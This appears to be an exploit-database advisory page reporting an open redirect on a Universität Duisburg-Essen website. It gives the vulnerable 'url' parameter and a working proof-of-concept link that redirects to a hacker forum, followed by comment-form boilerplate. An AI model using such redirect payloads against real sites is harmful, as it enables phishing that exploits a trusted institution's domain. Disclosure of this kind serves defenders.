Universität Duisburg-Essen Open Redirection Vulnerability

2019.07.10

Cerkuday (TR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
# Exploit Title: Universität Duisburg-Essen Open Redirection Vulnerability
# Author : Cerkuday //AKINCILAR
# Tested on : Windows 10
# Date : 10.07.2019
# Vendor Home: http://www.bhe.uni-due.de/
# Forum : http://www.cyber-warrior.org/
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()


demo:

http://www.bhe.uni-due.de/index.asp?url=

PoC 


http://www.bhe.uni-due.de/index.asp?url=https://www.cyber-warrior.org/

References:

https://youtu.be/s7HgpffPaJE

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Universität Duisburg-Essen Open Redirection Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.